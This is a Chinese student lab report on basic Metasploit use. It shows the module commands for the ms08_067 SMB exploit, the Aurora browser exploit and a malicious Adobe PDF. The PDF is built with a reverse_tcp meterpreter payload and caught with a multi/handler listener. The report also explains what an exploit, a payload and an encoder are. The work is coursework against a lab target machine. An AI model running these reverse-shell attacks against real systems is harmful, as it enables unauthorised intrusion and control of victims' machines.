• 20155304《网络对抗》MSF基础应用


    20155304《网络对抗》MSF基础应用

    实践内容

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1.1一个主动攻击实践,如ms08_067;

    1.2 一个针对浏览器的攻击,如ms11_050;

    1.3 一个针对客户端的攻击,如Adobe;

    1.4 成功应用任何一个辅助模块。

    1.1主动攻击:ms08_067

    使用靶机1和Kali

    先msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:

    image

    用use exploit/windows/smb/ms08_067_netapi使用该模块

    用show targets查看可以被攻击的靶机的操作系统型号:

    image

    用show payloads查看可以供我们使用的攻击载荷:

    image

    从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

    用show options查看需要设置的参数:

    image

    这里需要设置RHOST(靶机IP)和LHOST(Kali的IP)

    image

    设置target选项目标

    image

    用show options确认需要设置的参数是否已经设置好:

    image

    用exploit指令开始攻击

    攻击成功后会获取靶机的shell,可以对其进行操作:

    image

    1.2针对浏览器的攻击:MS10_002_aurora漏洞攻击

    msf > use windows/browser/ms10_002_aurora调用出该模块,然后设置tcp反弹连接

    image

    查看需要修改的参数

    image

    SRVHOST和LHOST的ip为攻击机的ip。设置好参数后,exploit

    image

    攻击成功,输入sessions -i -1,查看XP桌面信息

    image

    还有靶机的ip信息等

    image

    1.3针对客户端的攻击:adobe_toolbutton

    用search adobe查询一下针对该漏洞的攻击模块:

    image

    选择一个模块使用

    用show targets查看可以被攻击的靶机的操作系统型号:

    image

    image

    ,使用命令set payload windows/meterpreter/reverse_tcp设置payload攻击载荷

    用show options查看需要设置的参数:

    image

    image

    设置相应参数,实施exploit攻击,在/root/.msf4/local/目录下成功生成了一.pdf文件

    将pdf文件粘贴到靶机win xp

    在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口

    image

    在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

    image

    1.4 成功应用任何一个辅助模块:

    查看都有什么辅助模块:

    image

    我选择了这个

    image

    info查看、设置好要设置的参数

    image

    可以查看系统信息了:

    image

    基础问题回答

    (1)用自己的话解释什么是exploit,payload,encode.

    exploit:是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。

    payload:就是被运送的间谍,到了房子里头就可以执行各种间谍活动。简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。

    encode:是间谍穿的伪装的衣服,便于间谍潜入目标针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。

    实验总结和收获

    通过这次实验,我了解到了msf平台的厉害,不仅可以利用多种辅助模块获取靶机信息,还能够查看大部分存在的漏洞并利用这些漏洞实现不同攻击,这里面,更是可以直接实现主动攻击,只要系统存在这个漏洞,就会被直接攻破,看来,实时更新系统是很有必要的

  • 相关阅读:
    heml学习笔记
    离线安装
    linux 监测网络流量的工具 ifstat
    Python的 “内存管理机制”,转载,内存泄漏时感觉应该看下
    http 请求
    Java之调用Python代码 转载:https://mp.weixin.qq.com/s/cr8dXzwsQhtei9TfXwcMcA
    python 加密 so 转载:https://mp.weixin.qq.com/s/xmr3fs72XeJn-sMIoGftNA
    migrate
    查看 GPU 基本信息 nvidia-smi 命令
    MVC 基于 AuthorizeAttribute 实现的登陆权限控制
  • 原文地址:https://www.cnblogs.com/tyn5304/p/8988086.html
Copyright © 2020-2023  润新知